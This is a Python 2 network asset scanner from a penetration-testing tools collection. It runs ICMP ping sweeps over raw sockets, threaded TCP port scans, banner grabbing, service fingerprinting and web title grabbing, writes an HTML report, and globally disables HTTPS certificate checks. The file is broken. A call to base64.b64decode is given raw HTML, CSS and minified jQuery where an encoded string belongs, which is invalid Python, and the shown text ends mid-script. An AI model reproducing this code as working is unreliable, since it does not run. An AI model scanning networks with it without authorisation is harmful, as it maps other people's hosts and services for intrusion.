|
038c0784ed4216ab56c12b34d29cfd1226bd4e18
| 145,367
|
py
|
Python
|
python/F-NAScan.py
|
mabangde/pentesttools
|
0db14c490e62d5db4b184c46e0af2d2f8c1861f2
|
[
"Linux-OpenIB"
] | 142
|
2019-09-09T01:34:31.000Z
|
2022-01-21T14:24:22.000Z
|
python/F-NAScan.py
|
gcxtx/pentesttools
|
28cf92c4e2742dd260d40c149614daa022bad8ec
|
[
"Linux-OpenIB"
] | null | null | null |
python/F-NAScan.py
|
gcxtx/pentesttools
|
28cf92c4e2742dd260d40c149614daa022bad8ec
|
[
"Linux-OpenIB"
] | 39
|
2019-09-09T02:03:07.000Z
|
2022-03-22T03:22:19.000Z
|
#coding:utf-8
#author:wolf@future-sec
import getopt,sys,Queue,threading,socket,struct,urllib2,time,os,re,json,base64,cgi,array,ssl

# Shared scanner state: work queue, output lock, and result tables keyed by
# "host" / "host:port".
queue = Queue.Queue()
mutex = threading.Lock()
timeout = 10     # seconds; halved for the TCP connect in scan_port()
port_list = []   # ports to scan (populated elsewhere in this file)
re_data = {}     # host -> list of open ports / "port service" strings
port_data = {}   # "host:port" -> URL-quoted banner / HTTP response
statistics = {}  # service name -> occurrence count

# Disable HTTPS certificate verification when this interpreter supports it
# (PEP 476); older builds lack the attribute and need no change.
try:
    _create_unverified_https_context = ssl._create_unverified_context
except AttributeError:
    pass
else:
    ssl._create_default_https_context = _create_unverified_https_context
class UnicodeStreamFilter:
    """Wrap a stream and transcode writes to the stream's native encoding.

    Used on cp936 (GBK) Windows consoles below, where printing UTF-8 text
    directly would raise UnicodeEncodeError; unencodable characters are
    replaced instead of being fatal.
    """
    def __init__(self, target):
        self.target = target     # underlying stream (e.g. sys.stdout)
        self.encoding = 'utf-8'  # encoding this wrapper advertises
        self.errors = 'replace'  # never raise on unencodable characters
        self.encode_to = self.target.encoding
    def write(self, s):
        # Normalize byte strings to unicode first (source text is UTF-8),
        # then round-trip through the console encoding with replacement.
        if type(s) == str:
            s = s.decode("utf-8")
        s = s.encode(self.encode_to, self.errors).decode(self.encode_to)
        self.target.write(s)
# Only install the transcoding wrapper on cp936 (GBK) consoles.
if sys.stdout.encoding == 'cp936':
    sys.stdout = UnicodeStreamFilter(sys.stdout)
class SendPingThr(threading.Thread):
    """Background sender: fire one ICMP echo request at every IP in the pool.

    Sending runs in its own thread so the caller can block on recvfrom()
    while the requests go out.
    """
    def __init__(self, ipPool, icmpPacket, icmpSocket, timeout=3):
        threading.Thread.__init__(self)
        self.Sock = icmpSocket
        self.ipPool = ipPool      # iterable of dotted-quad address strings
        self.packet = icmpPacket  # pre-built ICMP echo-request packet
        self.timeout = timeout
        # Give the socket slightly more slack than the receive timeout.
        self.Sock.settimeout(timeout + 1)
    def run(self):
        # Short delay so the receiver is listening before the first send.
        time.sleep(0.01)
        for ip in self.ipPool:
            try:
                self.Sock.sendto(self.packet, (ip, 0))
            except socket.timeout:
                break
        # Stay alive while replies drain; the receiver loops until
        # isAlive() goes False.
        time.sleep(self.timeout)
class Nscan:
    """Multi-host ICMP ping sweep over a raw socket (requires root)."""
    def __init__(self, timeout=3):
        self.timeout = timeout
        # Echo payload: current time packed as a double (8 bytes).
        self.__data = struct.pack('d', time.time())
        # Use the PID as the ICMP identifier so replies can be tied to us.
        self.__id = os.getpid()
    @property
    def __icmpSocket(self):
        # Raw ICMP socket -- needs elevated privileges; failure is handled
        # by the caller (get_ac_ip).
        Sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.getprotobyname("icmp"))
        return Sock
    def __inCksum(self, packet):
        # RFC 1071 Internet checksum: one's-complement sum of 16-bit words.
        if len(packet) & 1:
            packet = packet + '\0'  # pad odd-length packets
        words = array.array('h', packet)
        sum = 0
        for word in words:
            sum += (word & 0xffff)
        # Fold carries back into the low 16 bits.
        sum = (sum >> 16) + (sum & 0xffff)
        sum = sum + (sum >> 16)
        return (~sum) & 0xffff
    @property
    def __icmpPacket(self):
        # Build the header with checksum 0, compute the checksum over the
        # whole packet, then rebuild the header with the real value.
        header = struct.pack('bbHHh', 8, 0, 0, self.__id, 0)  # type 8 = echo request
        packet = header + self.__data
        chkSum = self.__inCksum(packet)
        header = struct.pack('bbHHh', 8, 0, chkSum, self.__id, 0)
        return header + self.__data
    def mPing(self, ipPool):
        """Ping every IP in ipPool; return the subset that answered."""
        Sock = self.__icmpSocket
        Sock.settimeout(self.timeout)
        packet = self.__icmpPacket
        recvFroms = set()
        sendThr = SendPingThr(ipPool, packet, Sock, self.timeout)
        sendThr.start()
        while True:
            try:
                ac_ip = Sock.recvfrom(1024)[1][0]
                if ac_ip not in recvFroms:
                    log("active",ac_ip,0)
                    recvFroms.add(ac_ip)
            except Exception:
                pass
            finally:
                # Stop once the sender thread (and its grace sleep) is done.
                if not sendThr.isAlive():
                    break
        # Drop replies from hosts we never targeted (e.g. intermediate routers).
        return recvFroms & ipPool
def get_ac_ip(ip_list):
    """Return the ICMP-reachable subset of ip_list.

    Falls back to the full list when raw sockets are unavailable (no
    root privileges), so the port scan still proceeds against every host.
    """
    try:
        s = Nscan()
        ipPool = set(ip_list)
        return s.mPing(ipPool)
    except:
        # NOTE(review): bare except also hides errors other than missing
        # privileges.
        print 'The current user permissions unable to send icmp packets'
        return ip_list
class ThreadNum(threading.Thread):
    """Worker thread: pull "host:port" tasks off the queue and scan them."""
    def __init__(self,queue):
        threading.Thread.__init__(self)
        self.queue = queue
    def run(self):
        while True:
            try:
                # Exit when no work remains.
                if queue.empty():break
                queue_task = self.queue.get()
            except:
                break
            try:
                task_host,task_port = queue_task.split(":")
                data = scan_port(task_host,task_port)
                if data:
                    # 'NULL' means "open but no banner"; only real banners are
                    # stored for the report. (<> is the Python 2 spelling of !=)
                    if data <> 'NULL':
                        port_data[task_host + ":" + task_port] = urllib2.quote(data)
                    server_type = server_discern(task_host,task_port,data)
                    if not server_type:
                        # No banner signature matched: try probing it as a web server.
                        h_server,title = get_web_info(task_host,task_port)
                        if title or h_server:server_type = 'web ' + title
                    if server_type:log('server',task_host,task_port,server_type.strip())
            except Exception,e:
                continue
def get_code(header,html):
    """Best-effort charset detection for an HTTP response.

    Checks the HTML <meta charset> declaration first, then the
    Content-Type header; returns the charset name or None (implicitly)
    when neither declares one.
    """
    try:
        m = re.search(r'<meta.*?charset\=(.*?)"(>| |\/)',html, flags=re.I)
        if m:
            return m.group(1).replace('"','')
    except:
        pass
    try:
        if header.has_key('Content-Type'):
            Content_Type = header['Content-Type']
            m = re.search(r'.*?charset\=(.*?)(;|$)',Content_Type,flags=re.I)
            if m:return m.group(1)
    except:
        pass
def get_web_info(host,port):
	# Fetch http://host:port and return (response headers as str, page title).
	# Returns (False, False) when the request fails outright or yields no headers.
	# NOTE(review): Python 2 only (urllib2, `except X,e` syntax).
	h_server,h_xpb,title_str,html = '','','',''
	try:
		info = urllib2.urlopen("http://%s:%s"%(host,port),timeout=timeout)
		html = info.read()
		header = info.headers
	except urllib2.HTTPError,e:
		# HTTP error responses (4xx/5xx) still carry useful headers.
		header = e.headers
	except Exception,e:
		# Connection refused / timeout / non-HTTP service: nothing to report.
		return False,False
	if not header:return False,False
	try:
		# Re-encode the body to UTF-8 using the detected charset so the
		# title regex below sees consistent text; len<12 filters regex junk.
		html_code = get_code(header,html).strip()
		if html_code and len(html_code) < 12:
			html = html.decode(html_code).encode('utf-8')
	except:
		pass
	try:
		# Cache the full (escaped) response for the HTML report keyed by host:port.
		port_data[host + ":" + str(port)] = urllib2.quote(str(header) + "\r\n\r\n" + cgi.escape(html))
		title = re.search(r'<title>(.*?)</title>', html, flags=re.I|re.M)
		if title:title_str=title.group(1)
	except Exception,e:
		pass
	return str(header),title_str
def scan_port(host, port):
    """TCP-connect scan of host:port.

    Returns the service banner (first 512 bytes) when one is sent, the
    string 'NULL' for an open-but-silent port, or False when the port is
    closed/unreachable.  Logs open ports via log().
    """
    try:
        # `timeout` is a module-level global configured by the caller.
        socket.setdefaulttimeout(timeout / 2)
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    except Exception:
        return False
    try:
        sock.connect((str(host), int(port)))
        log('portscan', host, port)
    except Exception:
        sock.close()  # original leaked the socket when connect failed
        return False
    try:
        data = sock.recv(512)
        if len(data) > 2:
            return data
        return 'NULL'
    except Exception:
        # Open port that sent nothing before the timeout.
        return 'NULL'
    finally:
        sock.close()  # original also leaked it when recv raised
def log(scan_type, host, port, info=''):
    """Thread-safe reporter: prints a scan event and records it in the
    module-level `re_data` (per-host port list) and `statistics`
    (per-service counter) tables.

    scan_type is one of 'portscan', 'server', 'active'.
    """
    mutex.acquire()
    try:
        time_str = time.strftime('%X', time.localtime(time.time()))
        if scan_type == 'portscan':
            print("[%s] %s:%d open" % (time_str, host, int(port)))
            try:
                re_data[host].append(port)
            except KeyError:
                re_data[host] = [port]
        elif scan_type == 'server':
            print("[%s] %s:%d is %s" % (time_str, host, int(port), str(info)))
            try:
                server = info.split(" ")[0].replace("(default)", "")
                statistics[server] += 1
            except KeyError:
                statistics[server] = 1
            # Replace the bare port entry with "port service" in the report data.
            re_data[host].remove(port)
            re_data[host].append(str(port) + " " + str(info))
        elif scan_type == 'active':
            print("[%s] %s active" % (time_str, host))
    except Exception:
        pass
    finally:
        # Guaranteed release; the original released outside any finally.
        mutex.release()
def read_config(config_type):
    """Load service fingerprints from server_info.ini.

    Each line is "name|default_port|regex".  Returns a list of
    [name, port, reg] triples for config_type 'server_info', or None for
    any other type.  Exits the process if the file cannot be read.
    """
    if config_type == 'server_info':
        mark_list = []
        try:
            # `with` guarantees the handle is closed; the original leaked
            # it when a line failed to parse.
            with open('server_info.ini', 'r') as config_file:
                for mark in config_file:
                    name, port, reg = mark.strip().split("|", 2)
                    mark_list.append([name, port, reg])
            return mark_list
        except Exception:
            print('Configuration file read failed')
            exit()
def server_discern(host, port, data):
    """Identify the service on host:port using the global `mark_list`
    fingerprints ([name, default_port, regex] triples).

    A regex match against the banner wins outright; a default-port match is
    kept as a fallback tagged "(default)".  Returns '' when nothing matches.
    """
    server = ''
    for mark_info in mark_list:
        try:
            name, default_port, reg = mark_info
            if int(default_port) == int(port):
                server = name + "(default)"
            if reg and data != 'NULL':
                matchObj = re.search(reg, data, re.I | re.M)
                if matchObj:
                    server = name
            if server:
                return server
        except Exception:
            # Malformed fingerprint or bad regex: skip it.
            continue
    return server
def get_ip_list(ip):
    """Expand an IP specification into a list of dotted-quad strings.

    Accepts "a.b.c.d-a.b.c.e" ranges (at most 65536 addresses), a path to a
    .ini file with one spec per line, or a bare prefix: "a.b" expands the
    /16 and "a.b.c" the /24 (host bytes 1-254 only), while "a.b.c.d" is
    returned as-is.  Prints an error and returns what it has on bad input.
    """
    ip_list = []
    iptonum = lambda x: sum([256 ** j * int(i) for j, i in enumerate(x.split('.')[::-1])])
    # // keeps integer division on Python 2 AND 3 (original used / with long(),
    # which breaks on Python 3).
    numtoip = lambda x: '.'.join([str(x // (256 ** i) % 256) for i in range(3, -1, -1)])
    if '-' in ip:
        ip_range = ip.split('-')
        ip_start = iptonum(ip_range[0])
        ip_end = iptonum(ip_range[1])
        ip_count = ip_end - ip_start
        if 0 <= ip_count <= 65536:
            for ip_num in range(ip_start, ip_end + 1):
                ip_list.append(numtoip(ip_num))
        else:
            print('-h wrong format')
    elif '.ini' in ip:
        # `with` closes the handle even if a recursive expansion fails.
        with open(ip, 'r') as ip_config:
            for line in ip_config:
                ip_list.extend(get_ip_list(line.strip()))
    else:
        ip_split = ip.split('.')
        net = len(ip_split)
        if net == 2:
            for b in range(1, 255):
                for c in range(1, 255):
                    ip_list.append("%s.%s.%d.%d" % (ip_split[0], ip_split[1], b, c))
        elif net == 3:
            for c in range(1, 255):
                ip_list.append("%s.%s.%s.%d" % (ip_split[0], ip_split[1], ip_split[2], c))
        elif net == 4:
            ip_list.append(ip)
        else:
            print("-h wrong format")
    return ip_list
def get_port_list(port):
    """Parse a port specification.

    *port* is either a comma-separated list ("80,443,8080") or a path to a
    .ini file with one port per line.  Returns a list of port strings.
    """
    if '.ini' in port:
        port_list = []
        # `with` guarantees the config file is closed (original leaked it
        # if iteration raised).
        with open(port, 'r') as port_config:
            for line in port_config:
                port_list.append(line.strip())
        return port_list
    return port.split(',')
def write_result():
re_json = []
re_array = {}
td = ''
try:
ip_list = re_data.keys()
ip_list.sort()
for ip_str in ip_list:
port_array = []
for port_str in re_data[ip_str]:
port_array.append({"name":port_str,"url":"javascript:view('%s');"%(ip_str + ":" + port_str.split(" ")[0])})
ip_array = {"name":ip_str,"submenu":port_array}
if re_array.has_key(ip_str[0:ip_str.rindex('.')]+'.*'):
re_array[ip_str[0:ip_str.rindex('.')]+'.*'].append(ip_array)
else:
re_array[ip_str[0:ip_str.rindex('.')]+'.*']=[]
re_array[ip_str[0:ip_str.rindex('.')]+'.*'].append(ip_array)
for ip_c in re_array:
re_json.append({"name":ip_c,'submenu':re_array[ip_c]})
for server in statistics:
td += "<tr><td align='center'>%s</td><td align='center'>%d</td></tr>"%(server,statistics[server])
td_html = "<table><tr><th>Service</th><th>Count</th></tr>" + td + "</table>"
if re_json:
mo_html = base64.b64decode("<!doctype html>
<html>
	<head>
	<meta charset="UTF-8">
	<title>网络资产信息列表</title>
 	<style type="text/css">
		.wrap-menu{overflow-x:hidden;overflow-y:auto;min-width:25%;max-width:35%;background:#f6f6f6;font:12px/1.5 Tahoma,Arial,sans-serif;float:left;margin:10px}.wrap-menu ul{list-style:none;margin:0;padding:0}.wrap-menu ul li{text-indent:3em;white-space:nowrap}.wrap-menu ul li h2{cursor:pointer;height:100%;width:100%;margin:0 0 1px 0;font:12px/31px '宋体';color:#fff;background:#adadad}.wrap-menu ul li a{display:block;outline:0;height:25px;line-height:25px;margin:1px 0;color:#1a385c;text-decoration:none}.wrap-menu ul li img{margin-right:10px;margin-left:-17px;margin-top:9px;width:7px;height:7px;background-image:url(data:image/gif;base64,R0lGODlhBwAOALMMAEyEpUqEqUmEpkmFqUqFp0mEpEmDqUiEpkiFpEuDpkeDp0aFpv///wAAAAAAAAAAACH/C1hNUCBEYXRhWE1QPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0wTXBDZWhpSHpyZVN6TlRjemtjOWQiPz4gPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRhLyIgeDp4bXB0az0iQWRvYmUgWE1QIENvcmUgNS4wLWMwNjAgNjEuMTM0Nzc3LCAyMDEwLzAyLzEyLTE3OjMyOjAwICAgICAgICAiPiA8cmRmOlJERiB4bWxuczpyZGY9Imh0dHA6Ly93d3cudzMub3JnLzE5OTkvMDIvMjItcmRmLXN5bnRheC1ucyMiPiA8cmRmOkRlc2NyaXB0aW9uIHJkZjphYm91dD0iIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtbG5zOnhtcE1NPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvbW0vIiB4bWxuczpzdFJlZj0iaHR0cDovL25zLmFkb2JlLmNvbS94YXAvMS4wL3NUeXBlL1Jlc291cmNlUmVmIyIgeG1wOkNyZWF0b3JUb29sPSJBZG9iZSBQaG90b3Nob3AgQ1M1IFdpbmRvd3MiIHhtcE1NOkluc3RhbmNlSUQ9InhtcC5paWQ6RUE3MTQ1RjcyNEJCMTFFMjhBOTc4Q0QxQTI5RkIxOTUiIHhtcE1NOkRvY3VtZW50SUQ9InhtcC5kaWQ6RUE3MTQ1RjgyNEJCMTFFMjhBOTc4Q0QxQTI5RkIxOTUiPiA8eG1wTU06RGVyaXZlZEZyb20gc3RSZWY6aW5zdGFuY2VJRD0ieG1wLmlpZDpFQTcxNDVGNTI0QkIxMUUyOEE5NzhDRDFBMjlGQjE5NSIgc3RSZWY6ZG9jdW1lbnRJRD0ieG1wLmRpZDpFQTcxNDVGNjI0QkIxMUUyOEE5NzhDRDFBMjlGQjE5NSIvPiA8L3JkZjpEZXNjcmlwdGlvbj4gPC9yZGY6UkRGPiA8L3g6eG1wbWV0YT4gPD94cGFja2V0IGVuZD0iciI/PgH//v38+/r5+Pf29fTz8vHw7+7t7Ovq6ejn5uXk4+Lh4N/e3dzb2tnY19bV1NPS0dDPzs3My8rJyMfGxcTDwsHAv769vLu6ubi3trW0s7KxsK+urayrqqmop6alpKOioaCfnp2cm5qZmJeWlZSTkpGQj46NjIuKiYiHhoWEg4KBgH9+fXx7enl4d3Z1dHNycXBvbm1sa2ppaGdmZWRjYmFgX15dXFtaWVh
XVlVUU1JRUE9OTUxLSklIR0ZFRENCQUA/Pj08Ozo5ODc2NTQzMjEwLy4tLCsqKSgnJiUkIyIhIB8eHRwbGhkYFxYVFBMSERAPDg0MCwoJCAcGBQQDAgEAACH5BAEAAAwALAAAAAAHAA4AQAQfkEkgq7Ug13HCzVQVMoQSJIBBiOMEslccF4KwINZQRQA7);border:0}.wrap-menu ul li img.unfold{background-position:0 -9px}.wrap-menu ul li a:hover{background-color:#ccc;background-image:none}.wrap-data{overflow:auto;min-height:500px;min-width:40%;max-width:60%;background:#f6f6f6;font:12px/1.5 Tahoma,Arial,sans-serif;float:left;margin:10px;padding:10px 5px 15px 20px}
	</style>
	<script>
	(function(e,t){var n,r,i=typeof t,o=e.document,a=e.location,s=e.jQuery,u=e.$,l={},c=[],p="1.9.1",f=c.concat,d=c.push,h=c.slice,g=c.indexOf,m=l.toString,y=l.hasOwnProperty,v=p.trim,b=function(e,t){return new b.fn.init(e,t,r)},x=/[+-]?(?:\d*\.|)\d+(?:[eE][+-]?\d+|)/.source,w=/\S+/g,T=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,N=/^(?:(<[\w\W]+>)[^>]*|#([\w-]*))$/,C=/^<(\w+)\s*\/?>(?:<\/\1>|)$/,k=/^[\],:{}\s]*$/,E=/(?:^|:|,)(?:\s*\[)+/g,S=/\\(?:["\\\/bfnrt]|u[\da-fA-F]{4})/g,A=/"[^"\\\r\n]*"|true|false|null|-?(?:\d+\.|)\d+(?:[eE][+-]?\d+|)/g,j=/^-ms-/,D=/-([\da-z])/gi,L=function(e,t){return t.toUpperCase()},H=function(e){(o.addEventListener||"load"===e.type||"complete"===o.readyState)&&(q(),b.ready())},q=function(){o.addEventListener?(o.removeEventListener("DOMContentLoaded",H,!1),e.removeEventListener("load",H,!1)):(o.detachEvent("onreadystatechange",H),e.detachEvent("onload",H))};b.fn=b.prototype={jquery:p,constructor:b,init:function(e,n,r){var i,a;if(!e)return this;if("string"==typeof e){if(i="<"===e.charAt(0)&&">"===e.charAt(e.length-1)&&e.length>=3?[null,e,null]:N.exec(e),!i||!i[1]&&n)return!n||n.jquery?(n||r).find(e):this.constructor(n).find(e);if(i[1]){if(n=n instanceof b?n[0]:n,b.merge(this,b.parseHTML(i[1],n&&n.nodeType?n.ownerDocument||n:o,!0)),C.test(i[1])&&b.isPlainObject(n))for(i in n)b.isFunction(this[i])?this[i](n[i]):this.attr(i,n[i]);return this}if(a=o.getElementById(i[2]),a&&a.parentNode){if(a.id!==i[2])return r.find(e);this.length=1,this[0]=a}return this.context=o,this.selector=e,this}return e.nodeType?(this.context=this[0]=e,this.length=1,this):b.isFunction(e)?r.ready(e):(e.selector!==t&&(this.selector=e.selector,this.context=e.context),b.makeArray(e,this))},selector:"",length:0,size:function(){return this.length},toArray:function(){return h.call(this)},get:function(e){return null==e?this.toArray():0>e?this[this.length+e]:this[e]},pushStack:function(e){var t=b.merge(this.constructor(),e);return 
t.prevObject=this,t.context=this.context,t},each:function(e,t){return b.each(this,e,t)},ready:function(e){return b.ready.promise().done(e),this},slice:function(){return this.pushStack(h.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},eq:function(e){var t=this.length,n=+e+(0>e?t:0);return this.pushStack(n>=0&&t>n?[this[n]]:[])},map:function(e){return this.pushStack(b.map(this,function(t,n){return e.call(t,n,t)}))},end:function(){return this.prevObject||this.constructor(null)},push:d,sort:[].sort,splice:[].splice},b.fn.init.prototype=b.fn,b.extend=b.fn.extend=function(){var e,n,r,i,o,a,s=arguments[0]||{},u=1,l=arguments.length,c=!1;for("boolean"==typeof s&&(c=s,s=arguments[1]||{},u=2),"object"==typeof s||b.isFunction(s)||(s={}),l===u&&(s=this,--u);l>u;u++)if(null!=(o=arguments[u]))for(i in o)e=s[i],r=o[i],s!==r&&(c&&r&&(b.isPlainObject(r)||(n=b.isArray(r)))?(n?(n=!1,a=e&&b.isArray(e)?e:[]):a=e&&b.isPlainObject(e)?e:{},s[i]=b.extend(c,a,r)):r!==t&&(s[i]=r));return s},b.extend({noConflict:function(t){return e.$===b&&(e.$=u),t&&e.jQuery===b&&(e.jQuery=s),b},isReady:!1,readyWait:1,holdReady:function(e){e?b.readyWait++:b.ready(!0)},ready:function(e){if(e===!0?!--b.readyWait:!b.isReady){if(!o.body)return setTimeout(b.ready);b.isReady=!0,e!==!0&&--b.readyWait>0||(n.resolveWith(o,[b]),b.fn.trigger&&b(o).trigger("ready").off("ready"))}},isFunction:function(e){return"function"===b.type(e)},isArray:Array.isArray||function(e){return"array"===b.type(e)},isWindow:function(e){return null!=e&&e==e.window},isNumeric:function(e){return!isNaN(parseFloat(e))&&isFinite(e)},type:function(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?l[m.call(e)]||"object":typeof e},isPlainObject:function(e){if(!e||"object"!==b.type(e)||e.nodeType||b.isWindow(e))return!1;try{if(e.constructor&&!y.call(e,"constructor")&&!y.call(e.constructor.prototype,"isPrototypeOf"))return!1}catch(n){return!1}var r;for(r in e);return 
r===t||y.call(e,r)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},error:function(e){throw Error(e)},parseHTML:function(e,t,n){if(!e||"string"!=typeof e)return null;"boolean"==typeof t&&(n=t,t=!1),t=t||o;var r=C.exec(e),i=!n&&[];return r?[t.createElement(r[1])]:(r=b.buildFragment([e],t,i),i&&b(i).remove(),b.merge([],r.childNodes))},parseJSON:function(n){return e.JSON&&e.JSON.parse?e.JSON.parse(n):null===n?n:"string"==typeof n&&(n=b.trim(n),n&&k.test(n.replace(S,"@").replace(A,"]").replace(E,"")))?Function("return "+n)():(b.error("Invalid JSON: "+n),t)},parseXML:function(n){var r,i;if(!n||"string"!=typeof n)return null;try{e.DOMParser?(i=new DOMParser,r=i.parseFromString(n,"text/xml")):(r=new ActiveXObject("Microsoft.XMLDOM"),r.async="false",r.loadXML(n))}catch(o){r=t}return r&&r.documentElement&&!r.getElementsByTagName("parsererror").length||b.error("Invalid XML: "+n),r},noop:function(){},globalEval:function(t){t&&b.trim(t)&&(e.execScript||function(t){e.eval.call(e,t)})(t)},camelCase:function(e){return e.replace(j,"ms-").replace(D,L)},nodeName:function(e,t){return e.nodeName&&e.nodeName.toLowerCase()===t.toLowerCase()},each:function(e,t,n){var r,i=0,o=e.length,a=M(e);if(n){if(a){for(;o>i;i++)if(r=t.apply(e[i],n),r===!1)break}else for(i in e)if(r=t.apply(e[i],n),r===!1)break}else if(a){for(;o>i;i++)if(r=t.call(e[i],i,e[i]),r===!1)break}else for(i in e)if(r=t.call(e[i],i,e[i]),r===!1)break;return e},trim:v&&!v.call("\ufeff\u00a0")?function(e){return null==e?"":v.call(e)}:function(e){return null==e?"":(e+"").replace(T,"")},makeArray:function(e,t){var n=t||[];return null!=e&&(M(Object(e))?b.merge(n,"string"==typeof e?[e]:e):d.call(n,e)),n},inArray:function(e,t,n){var r;if(t){if(g)return g.call(t,e,n);for(r=t.length,n=n?0>n?Math.max(0,r+n):n:0;r>n;n++)if(n in t&&t[n]===e)return n}return-1},merge:function(e,n){var r=n.length,i=e.length,o=0;if("number"==typeof r)for(;r>o;o++)e[i++]=n[o];else while(n[o]!==t)e[i++]=n[o++];return 
e.length=i,e},grep:function(e,t,n){var r,i=[],o=0,a=e.length;for(n=!!n;a>o;o++)r=!!t(e[o],o),n!==r&&i.push(e[o]);return i},map:function(e,t,n){var r,i=0,o=e.length,a=M(e),s=[];if(a)for(;o>i;i++)r=t(e[i],i,n),null!=r&&(s[s.length]=r);else for(i in e)r=t(e[i],i,n),null!=r&&(s[s.length]=r);return f.apply([],s)},guid:1,proxy:function(e,n){var r,i,o;return"string"==typeof n&&(o=e[n],n=e,e=o),b.isFunction(e)?(r=h.call(arguments,2),i=function(){return e.apply(n||this,r.concat(h.call(arguments)))},i.guid=e.guid=e.guid||b.guid++,i):t},access:function(e,n,r,i,o,a,s){var u=0,l=e.length,c=null==r;if("object"===b.type(r)){o=!0;for(u in r)b.access(e,n,u,r[u],!0,a,s)}else if(i!==t&&(o=!0,b.isFunction(i)||(s=!0),c&&(s?(n.call(e,i),n=null):(c=n,n=function(e,t,n){return c.call(b(e),n)})),n))for(;l>u;u++)n(e[u],r,s?i:i.call(e[u],u,n(e[u],r)));return o?e:c?n.call(e):l?n(e[0],r):a},now:function(){return(new Date).getTime()}}),b.ready.promise=function(t){if(!n)if(n=b.Deferred(),"complete"===o.readyState)setTimeout(b.ready);else if(o.addEventListener)o.addEventListener("DOMContentLoaded",H,!1),e.addEventListener("load",H,!1);else{o.attachEvent("onreadystatechange",H),e.attachEvent("onload",H);var r=!1;try{r=null==e.frameElement&&o.documentElement}catch(i){}r&&r.doScroll&&function a(){if(!b.isReady){try{r.doScroll("left")}catch(e){return setTimeout(a,50)}q(),b.ready()}}()}return n.promise(t)},b.each("Boolean Number String Function Array Date RegExp Object Error".split(" "),function(e,t){l["[object "+t+"]"]=t.toLowerCase()});function M(e){var t=e.length,n=b.type(e);return b.isWindow(e)?!1:1===e.nodeType&&t?!0:"array"===n||"function"!==n&&(0===t||"number"==typeof t&&t>0&&t-1 in e)}r=b(o);var _={};function F(e){var t=_[e]={};return b.each(e.match(w)||[],function(e,n){t[n]=!0}),t}b.Callbacks=function(e){e="string"==typeof e?_[e]||F(e):b.extend({},e);var 
n,r,i,o,a,s,u=[],l=!e.once&&[],c=function(t){for(r=e.memory&&t,i=!0,a=s||0,s=0,o=u.length,n=!0;u&&o>a;a++)if(u[a].apply(t[0],t[1])===!1&&e.stopOnFalse){r=!1;break}n=!1,u&&(l?l.length&&c(l.shift()):r?u=[]:p.disable())},p={add:function(){if(u){var t=u.length;(function i(t){b.each(t,function(t,n){var r=b.type(n);"function"===r?e.unique&&p.has(n)||u.push(n):n&&n.length&&"string"!==r&&i(n)})})(arguments),n?o=u.length:r&&(s=t,c(r))}return this},remove:function(){return u&&b.each(arguments,function(e,t){var r;while((r=b.inArray(t,u,r))>-1)u.splice(r,1),n&&(o>=r&&o--,a>=r&&a--)}),this},has:function(e){return e?b.inArray(e,u)>-1:!(!u||!u.length)},empty:function(){return u=[],this},disable:function(){return u=l=r=t,this},disabled:function(){return!u},lock:function(){return l=t,r||p.disable(),this},locked:function(){return!l},fireWith:function(e,t){return t=t||[],t=[e,t.slice?t.slice():t],!u||i&&!l||(n?l.push(t):c(t)),this},fire:function(){return p.fireWith(this,arguments),this},fired:function(){return!!i}};return p},b.extend({Deferred:function(e){var t=[["resolve","done",b.Callbacks("once memory"),"resolved"],["reject","fail",b.Callbacks("once memory"),"rejected"],["notify","progress",b.Callbacks("memory")]],n="pending",r={state:function(){return n},always:function(){return i.done(arguments).fail(arguments),this},then:function(){var e=arguments;return b.Deferred(function(n){b.each(t,function(t,o){var a=o[0],s=b.isFunction(e[t])&&e[t];i[o[1]](function(){var e=s&&s.apply(this,arguments);e&&b.isFunction(e.promise)?e.promise().done(n.resolve).fail(n.reject).progress(n.notify):n[a+"With"](this===r?n.promise():this,s?[e]:arguments)})}),e=null}).promise()},promise:function(e){return null!=e?b.extend(e,r):r}},i={};return r.pipe=r.then,b.each(t,function(e,o){var a=o[2],s=o[3];r[o[1]]=a.add,s&&a.add(function(){n=s},t[1^e][2].disable,t[2][2].lock),i[o[0]]=function(){return 
i[o[0]+"With"](this===i?r:this,arguments),this},i[o[0]+"With"]=a.fireWith}),r.promise(i),e&&e.call(i,i),i},when:function(e){var t=0,n=h.call(arguments),r=n.length,i=1!==r||e&&b.isFunction(e.promise)?r:0,o=1===i?e:b.Deferred(),a=function(e,t,n){return function(r){t[e]=this,n[e]=arguments.length>1?h.call(arguments):r,n===s?o.notifyWith(t,n):--i||o.resolveWith(t,n)}},s,u,l;if(r>1)for(s=Array(r),u=Array(r),l=Array(r);r>t;t++)n[t]&&b.isFunction(n[t].promise)?n[t].promise().done(a(t,l,n)).fail(o.reject).progress(a(t,u,s)):--i;return i||o.resolveWith(l,n),o.promise()}}),b.support=function(){var t,n,r,a,s,u,l,c,p,f,d=o.createElement("div");if(d.setAttribute("className","t"),d.innerHTML="  <link/><table></table><a href='/a'>a</a><input type='checkbox'/>",n=d.getElementsByTagName("*"),r=d.getElementsByTagName("a")[0],!n||!r||!n.length)return{};s=o.createElement("select"),l=s.appendChild(o.createElement("option")),a=d.getElementsByTagName("input")[0],r.style.cssText="top:1px;float:left;opacity:.5",t={getSetAttribute:"t"!==d.className,leadingWhitespace:3===d.firstChild.nodeType,tbody:!d.getElementsByTagName("tbody").length,htmlSerialize:!!d.getElementsByTagName("link").length,style:/top/.test(r.getAttribute("style")),hrefNormalized:"/a"===r.getAttribute("href"),opacity:/^0.5/.test(r.style.opacity),cssFloat:!!r.style.cssFloat,checkOn:!!a.value,optSelected:l.selected,enctype:!!o.createElement("form").enctype,html5Clone:"<:nav></:nav>"!==o.createElement("nav").cloneNode(!0).outerHTML,boxModel:"CSS1Compat"===o.compatMode,deleteExpando:!0,noCloneEvent:!0,inlineBlockNeedsLayout:!1,shrinkWrapBlocks:!1,reliableMarginRight:!0,boxSizingReliable:!0,pixelPosition:!1},a.checked=!0,t.noCloneChecked=a.cloneNode(!0).checked,s.disabled=!0,t.opt